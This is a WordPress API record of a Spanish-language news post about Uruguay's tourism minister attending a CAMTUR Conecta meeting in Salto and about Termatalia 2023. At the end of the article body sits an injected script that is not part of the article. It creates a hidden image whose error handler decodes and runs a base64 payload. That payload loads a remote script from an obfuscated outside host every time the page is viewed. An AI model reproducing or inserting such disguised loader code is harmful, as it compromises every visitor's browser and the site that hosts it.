{"id":7136,"date":"2023-08-03T12:55:03","date_gmt":"2023-08-03T15:55:03","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7136"},"modified":"2025-08-13T15:56:14","modified_gmt":"2025-08-13T18:56:14","slug":"autoridades-del-mintur-participaron-en-salto-de-camtur-conecta","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7136","title":{"rendered":"Autoridades del MINTUR participaron en Salto de Camtur Conecta"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>El ministro de Turismo, Tabar\u00e9 Viera, y el director Nacional de Turismo, Roque Baudean, participaron en Salto del ciclo de charlas organizadas por la C\u00e1mara Uruguaya de Turismo, oportunidad que sirvi\u00f3 para conocer y poner en valor las propuestas del sector<\/em><\/h5>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-1024x512.jpg\" alt=\"\" class=\"wp-image-7028\" width=\"294\" height=\"147\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-1024x512.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-300x150.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-768x384.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-696x348.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-1068x534.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-840x420.jpg 840w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-320x160.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-480x240.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1-800x400.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-2023-scaled-1.jpg 1440w\" sizes=\"(max-width: 294px) 100vw, 294px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sub><mark class=\"has-inline-color has-vivid-cyan-blue-color\">Publicidad:<\/mark><\/sub><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>En dichas instancias se inform\u00f3 la agenda en la que trabaja CAMTUR, y la articulaci\u00f3n que se realiza con los distintos ministerios, en base a determinados temas de inter\u00e9s: IVA tasa cero, seguro de paro parcial, etc. Tambi\u00e9n se inform\u00f3 el trabajo conjunto de CAMTUR y Ceres en relaci\u00f3n al relevamiento de datos.<\/p>\n\n\n\n<p>Tambi\u00e9n se mencion\u00f3 las acciones de promoci\u00f3n previstas y las que ya se realizaron, adem\u00e1s del trabajo mancomunado y el apoyo y financiamiento del Ministerio de Turismo, con la importancia de poner en foco la comercializaci\u00f3n y reforzar mercados.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0000057884-resized-1280x720-1.png\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0000057884-resized-1280x720-1-1024x576.png\" alt=\"\" class=\"wp-image-7137\" width=\"333\" height=\"186\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0000057884-resized-1280x720-1-1024x576.png 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0000057884-resized-1280x720-1-300x169.png 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0000057884-resized-1280x720-1-768x432.png 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0000057884-resized-1280x720-1-1068x601.png 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0000057884-resized-1280x720-1-747x420.png 747w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0000057884-resized-1280x720-1-320x180.png 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0000057884-resized-1280x720-1-480x270.png 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0000057884-resized-1280x720-1-800x450.png 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0000057884-resized-1280x720-1.png 1280w\" sizes=\"(max-width: 333px) 100vw, 333px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Asimismo, se analiz\u00f3 la situaci\u00f3n que vive el sector tur\u00edstico, en particular en Salto, y a su vez se puso foco en el evento m\u00e1s importante del termalismo a nivel mundial: Termatalia 2023, que se realizar\u00e1 del 4 al 6 de octubre en Salto y Paysand\u00fa. En este sentido, se proyect\u00f3 un video de Arnaldo Nardone, asesor del ministerio y referente del Turismo MICE, con la presentaci\u00f3n de Termatalia y su significado para Salto y el Uruguay.<\/p>\n\n\n\n<p>El ministro de Turismo, Tabar\u00e9 Viera, se refiri\u00f3 a Termatalia y destac\u00f3 que m\u00e1s de 20 pa\u00edses participar\u00e1n de esta feria internacional y expres\u00f3 que \u201ctodos debemos trabajar juntos para preparar este gran evento\u201d. Adem\u00e1s, Viera subray\u00f3 que esta 21\u00ba edici\u00f3n, ser\u00e1 la quinta celebrada en el exterior, y la importancia de recuperar la alternancia entre Ourense (sede fija cuando el evento se realiza en Europa) y un pa\u00eds de Am\u00e9rica, en este caso Salto y Paysand\u00fa, en Uruguay.<\/p>\n\n\n\n<p>A su vez, se visibilizaron diversos temas para trabajar: la mano de obra migrante, el apoyo al sector que sufre el impacto por la situaci\u00f3n fronteriza y la evaluaci\u00f3n de medidas para incentivar el turismo deportivo, la gobernanza p\u00fablico privada y entre instituciones para trabajar y preparar al Destino Termas, para Termatalia.<\/p>\n\n\n\n<p>Por \u00faltimo, se plantearon distintas realidades de cada una de las instituciones que integran el destino y como trabajan para posicionar al departamento en la Regi\u00f3n Litoral, la mejora de las rutas nacionales para fortalecer la conectividad y el turismo interno, turismo aventura, turismo deportivo, el fortalecimiento del sector gastron\u00f3mico a trav\u00e9s del trabajo en conjunto con productores locales, el costo de los eventos y la dificultad de los privados para realizarlos.<\/p>\n\n\n\n<p>Adem\u00e1s de las autoridades del MINTUR y de la directiva de CAMTUR, participaron de esta reuni\u00f3n abierta: operadores, productores y prestadores de servicios. <img decoding=\"async\" src=\"https:\/\/es.travel2latam.com\/visitas\/83855\" alt=\"\"><\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.gub.uy\/ministerio-turismo\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_3-8-2023_125324_www.gub_.uy_.jpeg\" alt=\"\" class=\"wp-image-7138\" width=\"208\" height=\"89\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_3-8-2023_125324_www.gub_.uy_.jpeg 340w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_3-8-2023_125324_www.gub_.uy_-300x129.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_3-8-2023_125324_www.gub_.uy_-320x137.jpeg 320w\" sizes=\"(max-width: 208px) 100vw, 208px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El ministro de Turismo, Tabar\u00e9 Viera, y el director Nacional de Turismo, Roque Baudean, participaron en Salto del ciclo de charlas organizadas por la C\u00e1mara Uruguaya de Turismo, oportunidad que sirvi\u00f3 para conocer y poner en valor las propuestas del sector En dichas instancias se inform\u00f3 la agenda en la que trabaja CAMTUR, y la [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7139,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[30],"tags":[],"class_list":["post-7136","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-temas-relacionados"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7136","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7136"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7136\/revisions"}],"predecessor-version":[{"id":10343,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7136\/revisions\/10343"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7139"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7136"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7136"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}